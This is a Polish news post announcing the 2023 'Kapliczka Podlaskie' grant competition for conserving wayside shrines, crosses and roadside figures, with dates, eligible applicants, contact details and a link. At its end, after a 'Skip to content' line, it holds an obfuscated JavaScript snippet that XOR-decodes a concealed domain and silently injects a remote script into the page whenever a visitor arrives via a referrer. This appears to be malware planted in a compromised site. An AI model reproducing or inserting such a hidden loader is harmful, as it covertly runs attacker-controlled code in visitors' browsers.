Aktualności

Konkurs „Kapliczka Podlaskie 2023- ocalić od zapomnienia”

mar 30, 2023 | Aktualności

Zachęcamy do udziału w konkursie, w którym można uzyskać wsparcie na konserwację, restaurację kapliczki, krzyża lub figury przydrożnej oraz zagospodarowanie najbliższego otoczenia. Wnioski można składać od 20 marca do 13 kwietnia. Kapliczki, przy których będą wykonywane prace konserwatorskie, restauratorskie lub roboty budowlane nie mogą być wpisane do rejestru zabytków województwa podlaskiego lub gminnych ewidencji zabytków, ale powinny posiadać wartość artystyczną lub historyczną.

Dofinansowanie mogą uzyskać m.in. organizacje pozarządowe, kościoły, związki wyznaniowe, stowarzyszenia jednostek samorządu terytorialnego, spółdzielnie socjalne czy spółki akcyjne.

Bliższe szczegóły dotyczące konkursu, dokumenty oraz regulamin można uzyskać w dołączonym poniżej linku oraz kontaktując się Departament Kultury i Dziedzictwa Narodowego tel. 85 66 54 865.

Link do konkursu:

https://podlaskie.eu/kultura/rusza-konkurs-kapliczki-podlaskie-2023–ocalic-od-zapomnienia.html

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);